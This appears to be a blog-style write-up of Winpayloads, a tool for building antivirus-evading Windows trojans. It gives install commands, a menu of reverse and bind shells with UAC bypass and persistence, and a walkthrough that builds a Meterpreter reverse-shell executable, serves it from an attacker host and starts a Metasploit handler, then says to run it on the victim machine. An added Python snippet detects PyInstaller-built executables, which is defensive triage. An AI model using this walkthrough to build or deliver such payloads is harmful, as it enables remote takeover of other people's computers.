Tool link
https://github.com/nccgroup/Winpayloads
Introduction
Winpayloads is a tool for building Windows trojans intended to evade antivirus detection.
Installation
Download
git clone https://github.com/nccgroup/Winpayloads.git
cd Winpayloads
Install
chmod +x setup.sh
./setup.sh
What it looks like when launched after installation
[Winpayloads ASCII-art banner: NCCGroup - CharlieDean]
===================================================================================================================================Main Menu==================================================================================================================================
1: Windows Reverse Shell
2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]
3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks]
4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks]
5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks]
ps: PowerShell Menu
stager: Powershell Interpreter Stager
clients: Connected Interpreter Clients
?: Print Detailed Help
back: Main Menu
exit: Exit
==============================================================================================================================================================================================================================================================================
Main Menu >
Usage
For example, to generate a Windows Meterpreter Reverse Shell:
Main Menu > 2
[*] Press Enter For Default Port(4444)
[*] Port> 4444
[*] Press Enter To Get Local Ip Automatically(1.1.1.16)
[*] IP>
[*] IP SET AS 1.1.1.16
[*] PORT SET AS 4444
[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y
[*] Creating Payload using Pyinstaller...
- Genera
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe
[*] Upload To Local Websever or (p)sexec? [y]/p/n: y
[*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe
[Metasploit ASCII-art banner]
=[ metasploit v4.14.27-dev ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job.
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
msf exploit(handler) >
Open http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe on the victim machine and run it.
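The walkthrough above shows the payload being built with PyInstaller. As an added example (not from the page or the Winpayloads project), the Python snippet below shows how a defender can triage a downloaded executable for the CArchive cookie that PyInstaller-built binaries carry; the two sample blobs are constructed here, not real payloads, and the cookie layout used to build the sample is assumed to follow PyInstaller's "!8sIIii64s" format.

```python
import struct

# PyInstaller-built executables carry a CArchive "cookie" near the end of the
# file; its first 8 bytes are this fixed magic (PyInstaller's PYINST_COOKIE).
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Only the tail of the file needs to be searched (the bootloader itself locates
# the cookie by scanning backwards for the magic); 64 KiB is a generous window.
TAIL_WINDOW = 64 * 1024


def is_pe(data: bytes) -> bool:
    """True if the blob starts with the DOS 'MZ' stub every PE file has."""
    return data[:2] == b"MZ"


def find_pyinstaller_cookie(data: bytes) -> int:
    """Return the offset of the PyInstaller cookie magic, or -1 if absent."""
    start = max(0, len(data) - TAIL_WINDOW)
    return data.rfind(PYINSTALLER_MAGIC, start)


def triage(data: bytes) -> dict:
    """Summarise what a quick static look at a downloaded file reveals."""
    cookie_at = find_pyinstaller_cookie(data)
    return {
        "is_pe": is_pe(data),
        "pyinstaller": cookie_at != -1,
        "cookie_offset": cookie_at,
    }


# Constructed sample: a fake PE-like blob with a PyInstaller-style cookie
# appended (assumed layout: magic, package length, TOC offset, TOC length,
# Python version, pylib name), mimicking a onefile build.
_cookie = struct.pack("!8sIIii64s", PYINSTALLER_MAGIC, 4096, 0, 0, 27, b"python27.dll")
SAMPLE_PYINSTALLER = b"MZ" + b"\x00" * 1024 + b"PYZ-archive-placeholder" + _cookie
# Constructed sample: a plain binary with no cookie.
SAMPLE_PLAIN = b"MZ" + b"\x90" * 512

if __name__ == "__main__":
    for name, blob in (("pyinstaller", SAMPLE_PYINSTALLER), ("plain", SAMPLE_PLAIN)):
        print(name, triage(blob))
```

The cookie is a static marker, so a packer or a rebuilt bootloader can remove it; treat a hit as a strong hint, not as proof, and absence as no evidence either way.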
Evaluation
In practice it does not achieve full AV evasion, probably because the tool has been around for so long, but the way it generates the trojan is quite simple and worth a try.